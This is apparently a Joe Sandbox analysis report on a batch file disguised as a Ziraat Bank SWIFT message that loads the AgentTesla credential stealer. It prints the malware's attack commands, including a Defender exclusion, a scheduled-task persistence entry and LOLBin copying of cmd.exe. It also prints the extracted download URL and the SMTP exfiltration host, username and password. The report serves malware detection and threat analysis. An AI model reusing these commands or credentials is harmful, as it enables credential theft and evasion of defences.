Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat

Overview

General Information

Sample name:Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat
Analysis ID:1553795
MD5:9096921da7521dd3a36a5fb35fc84fa9
SHA1:bcf834c98de442f75b21e053c3b9d893aebb5b24
SHA256:769f8dac244efda700b8d9e966a8b33c4b27aa8180d7898f9a829210076d3066
Tags:batgeoTURuser-lowmal3
Infos:

Detection

AgentTesla, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected DBatLoader
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2856 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 2848 cmdline: extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • x.exe (PID: 4424 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: BDC3B662D1136F20F51F55A0F6A2FB9D)
      • cmd.exe (PID: 3576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 6188 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • esentutl.exe (PID: 6544 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 4884 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • lxsyrsiW.pif (PID: 4676 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
        • neworigin.exe (PID: 4352 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
        • server_BTC.exe (PID: 3160 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
          • powershell.exe (PID: 3832 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7260 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 5828 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • TrojanAIbot.exe (PID: 5212 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
          • cmd.exe (PID: 5180 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp692E.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 6544 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • TrojanAIbot.exe (PID: 5352 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)
  • Wisrysxl.PIF (PID: 7456 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: BDC3B662D1136F20F51F55A0F6A2FB9D)
    • lxsyrsiW.pif (PID: 7520 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 7572 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 7588 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • Wisrysxl.PIF (PID: 7740 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: BDC3B662D1136F20F51F55A0F6A2FB9D)
    • lxsyrsiW.pif (PID: 7796 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 7876 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • TrojanAIbot.exe (PID: 8020 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\neworigin.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    C:\Users\user\AppData\Local\Temp\neworigin.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      C:\Users\user\AppData\Local\Temp\neworigin.exeINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
      • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
      • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
      • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
      • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
      • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
      • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
      • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
      • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
      SourceRuleDescriptionAuthorStrings
      0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000D.00000002.1691089667.00000000030C9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000001C.00000002.2693859207.0000000002CBC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000020.00000002.2692159904.000000000307C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0000001C.00000002.2693859207.0000000002C91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 14 entries
                SourceRuleDescriptionAuthorStrings
                13.0.neworigin.exe.d90000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  13.0.neworigin.exe.d90000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    13.0.neworigin.exe.d90000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    4.2.x.exe.2a00000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

                      System Summary

                      barindex
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4424, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4424, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 4676, ProcessName: lxsyrsiW.pif
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3160, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3832, ProcessName: powershell.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4424, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 4676, ProcessName: lxsyrsiW.pif
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3160, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3832, ProcessName: powershell.exe
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 3160, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3160, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5828, ProcessName: schtasks.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 4352, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3160, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5828, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3160, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3832, ProcessName: powershell.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-11T18:02:43.410691+010020229301A Network Trojan was detected4.245.163.56443192.168.2.849709TCP
                      2024-11-11T18:03:21.873238+010020229301A Network Trojan was detected4.245.163.56443192.168.2.849721TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-11T18:02:28.043830+010020283713Unknown Traffic192.168.2.849706198.252.105.91443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeAvira: detection malicious, Label: TR/Spy.Gen8
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFAvira: detection malicious, Label: HEUR/AGEN.1326052
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: HEUR/AGEN.1326052
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batMalware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
                      Source: 13.0.neworigin.exe.d90000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFReversingLabs: Detection: 23%
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeReversingLabs: Detection: 65%
                      Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 23%
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeReversingLabs: Detection: 65%
                      Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batReversingLabs: Detection: 23%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeJoe Sandbox ML: detected
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.8:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49718 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.00000000206E3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443292232.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.0000000020787000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1493765037.00000000054E0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1497786383.0000000004A20000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.1497081210.0000000021C10000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1497081210.0000000021C3F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.00000000206E3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443906217.00000000027DB000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1443292232.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1444132666.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1510941907.00000000027DD000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1526389874.0000000020787000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.1493765037.00000000054E0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1497786383.0000000004A20000.00000004.00001000.00020000.00000000.sdmp

                      Spreading

                      barindex
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02A05908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02A05908
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 030B7394h14_2_030B7188
